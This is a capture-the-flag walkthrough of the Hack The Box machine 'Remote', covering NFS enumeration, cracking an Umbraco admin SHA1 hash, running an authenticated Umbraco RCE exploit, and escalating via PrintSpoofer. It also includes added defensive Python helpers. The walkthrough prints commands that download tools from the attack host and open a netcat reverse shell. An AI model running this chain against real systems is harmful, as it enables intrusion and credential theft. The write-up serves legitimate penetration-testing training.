
HTB - Remote

Scope

IP Address 10.10.10.180

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -F $ip -Pn

PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
111/tcp  open  rpcbind
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2049/tcp open  nfs
5985/tcp open  wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ nmap -p21,80,111,139,445,2049,5985 $ip -sCV -oA Nmap/script-scan 

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4s
| smb2-time: 
|   date: 2024-07-06T02:24:29
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
* Open ports: 21, 80, 111, 135, 139, 445, 2049, 5985
* UDP Open ports: 111, 2049
* Services: FTP - HTTP - RPC - SMB - NFS - winRM
* Important Notes: FTP Anonymous login

Service Enumeration

FTP

I noticed from Nmap that anonymous login is allowed, but it didn't lead to anything.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip

2024-07-05 22:42:16 (0.00 B/s) - ‘10.10.10.180/.listing’ saved [0]

SMB

SMB enumeration didn't lead to anything either.

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ smbclient -N -L //$ip                   
session setup failed: NT_STATUS_ACCESS_DENIED

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                        

SMB         10.10.10.180    445    REMOTE           [-] remote\: STATUS_ACCESS_DENIED 

RPC

The same as SMB :(

┌──(kali㉿kali)-[~/…/HTB/machines/Remote/10.10.10.180]
└─$ rpcclient -U "%" $ip                                             
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

NFS

I found port 2049 open, which is used by the Network File System (NFS), so I'll check whether any folders are accessible.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ showmount -e $ip                      
Export list for 10.10.10.180:
/site_backups (everyone)

I found an interesting folder, so I'll mount it on my host and look at its contents.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ mkdir mnt                                                                   

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ sudo mount -t nfs $ip:/ ./mnt -o nolock

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ cd mnt/site_backups 

┌──(kali㉿kali)-[~/…/machines/Remote/mnt/site_backups]
└─$ ls
App_Browsers  App_Plugins  Global.asax  Umbraco         Views       aspnet_client  css           scripts
App_Data      Config       Media        Umbraco_Client  Web.config  bin            default.aspx

I tried to hunt for usernames and passwords, but nothing turned up with grep, so I searched online for where Umbraco CMS stores its credentials and found this:

The CMS stores its credentials in Umbraco.sdf. Knowing this, I tried to open the file with a text editor, but it's a binary file, so I listed its contents with strings and grepped for credential-related keywords.

┌──(kali㉿kali)-[~/…/machines/Remote/mnt/App_Data]
└─$ strings Umbraco.sdf | grep "users\|password\|hashes\|admin"

<snip>
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
<snip>

So the file says the hash is SHA1; let's get the hashcat mode, then fire up hashcat and crack it.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashid -m b8be16afba8c314ad33d812f22a04991b90e2aaa

[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ hashcat -m 100 hash /usr/share/wordlists/rockyou.txt 

b8be16afba8c314ad33d812f22a04991b90e2aaa:baconanxxxxxxx  

Session..........: hashcat
Status...........: Cracked
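The record pulled out of Umbraco.sdf above is an email, a bare hex digest and a JSON hash config run together. The following is an added example (not the author's tooling or Umbraco's own code) that parses records of that shape, flags legacy unsalted algorithms, and contrasts the stored form with the salted, slow KDF a password store should use instead; the digest lengths table and the PBKDF2 parameters are assumptions for the demo.

```python
"""Audit Umbraco user records recovered from a backup copy of Umbraco.sdf.

Added example for this write-up, not the author's tooling or Umbraco code.
It parses lines in the shape 'strings' produced above (email, hex digest and
JSON hash config run together) and flags legacy unsalted algorithms.
"""
import hashlib
import json

# Hex digest lengths for algorithms a legacy provider could store unsalted (assumption).
DIGEST_HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64}

# Record taken from the write-up's strings output above.
SAMPLE_RECORD = 'admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}'


def parse_record(line):
    """Split 'email+digest+json' into its parts, or return None if malformed."""
    head, brace, cfg = line.strip().partition("{")
    if not brace:
        return None
    algorithm = json.loads(brace + cfg).get("hashAlgorithm", "").upper()
    n = DIGEST_HEX_LEN.get(algorithm)
    if n is None or len(head) <= n:
        return None
    digest, email = head[-n:].lower(), head[:-n]   # digest is the fixed-length tail
    if any(c not in "0123456789abcdef" for c in digest) or "@" not in email:
        return None
    return {"email": email, "digest": digest, "algorithm": algorithm}


def assess(record):
    """Unsalted MD5/SHA1 are fast and identical for every user sharing a password:
    one wordlist pass recovers them, as the write-up shows with hashcat mode 100."""
    if record["algorithm"] in ("MD5", "SHA1"):
        return "WEAK: unsalted %s, migrate to a salted slow KDF" % record["algorithm"]
    return "REVIEW: %s stored without a salt field" % record["algorithm"]


def legacy_digest(password, algorithm="SHA1"):
    """Unsalted digest in the stored form: the same for every user with that password."""
    return hashlib.new(algorithm.lower(), password.encode()).hexdigest()


def salted_kdf(password, salt, rounds=100_000):
    """What a store should hold instead: per-user salt plus a slow KDF (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds).hex()
```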

Initial Access


At http://10.10.10.180/umbraco/ there is a login form.

I logged in with the credentials found before, then looked for the web app version.

I decided to search for public CVEs with searchsploit.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ searchsploit umbraco        
<snip>
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) | aspx/webapps/49488.py
<snip>

I searched GitHub for a PoC matching the web app's version and found this one:

I cloned it locally and ran the exploit.

┌──(env)─(kali㉿kali)-[~/…/HTB/machines/Remote/Umbraco-RCE]
└─$ python exploit.py -u admin@htb.local -p 'baconanxxxxxxx' -w http://10.10.10.180/ -i 10.10.16.25

[+] Trying to bind to :: on port 4444: Done
[+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.180 on port 49705
[+] Trying to bind to :: on port 4445: Done
[+] Waiting for connections on :::4445: Got connection from ::ffff:10.10.10.180 on port 49706
[*] Logging in at http://10.10.10.180//umbraco/backoffice/UmbracoApi/Authentication/PostLogin
[*] Exploiting at http://10.10.10.180//umbraco/developer/Xslt/xsltVisualize.aspx
[*] Switching to interactive mode

PS C:\windows\system32\inetsrv> 
PS C:\Users\Public> type Desktop\user.txt
442f18b8accdec694dxxxxxxxxxxx

User flag 442f18b8accdec694dxxxxxxxxxxx


Privilege Escalation

When I ran the whoami command and saw the output, I knew it was an easy win, because the user iis apppool\defaultapppool often has SeImpersonatePrivilege, which can be used to escalate to SYSTEM using RoguePotato or PrintSpoofer.

PS C:\Users\Public> whoami 
iis apppool\defaultapppool

Let's verify

PS C:\Users\Public> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
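The whoami /priv table above is what an auditor of a service account's token should read too, and a privilege shown as Disabled is still held by the token and can be enabled by the process. The following is an added example (not the author's tooling) that parses that table using the ruler line for column boundaries and reports the high-impact privileges the token holds; the HIGH_IMPACT watch list is an assumption for the demo.

```python
import re

# Privileges commonly abused to reach SYSTEM; the write-up's path uses the first one (assumed list).
HIGH_IMPACT = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
               "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
               "SeLoadDriverPrivilege"}

# Sample copied from the write-up's shell session above (trailing spaces trimmed).
SAMPLE = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_privileges(text):
    """Parse whoami /priv output into {name: {"description": ..., "state": ...}}.

    Column boundaries come from the '=== ===' ruler line, so descriptions
    containing spaces are handled and the last column is read to end of line.
    """
    lines = [l.rstrip() for l in text.splitlines()]
    ruler = next(i for i, l in enumerate(lines) if l.startswith("="))
    spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[ruler])]
    spans[-1] = (spans[-1][0], None)          # last column: read to end of line
    privs = {}
    for line in lines[ruler + 1:]:
        if not line.strip():
            continue
        name, desc, state = (line[s:e].strip() for s, e in spans)
        privs[name] = {"description": desc, "state": state}
    return privs


def high_impact_held(privs):
    """High-impact privileges present in the token. 'Disabled' only means not
    currently enabled; the process can turn it on, so it still counts as held."""
    return sorted(p for p in privs if p in HIGH_IMPACT)


def audit(text):
    """Return (held, enabled) lists of high-impact privileges for a report."""
    privs = parse_privileges(text)
    held = high_impact_held(privs)
    enabled = [p for p in held if privs[p]["state"] == "Enabled"]
    return held, enabled
```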

I downloaded PrintSpoofer.exe and nc.exe from my attack host.

PS C:\Users\Public> curl 10.10.16.25/PrintSpoofer.exe -o .\PrintSpoofer.exe
PS C:\Users\Public> curl 10.10.16.25/nc.exe -o .\nc.exe

Easy win :)

PS C:\Users\Public> .\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
.\PrintSpoofer.exe -c "c:\Users\Public\nc.exe 10.10.16.25 1337 -e PowerShell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Remote]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.25] from (UNKNOWN) [10.10.10.180] 49719

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> type root.txt
60ea8c532b06a17faxxxxxxxxxxxxxxx

Root flag 60ea8c532b06a17faxxxxxxxxxxxxxxx

Reference: GitHub - Jonoans/Umbraco-RCE: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution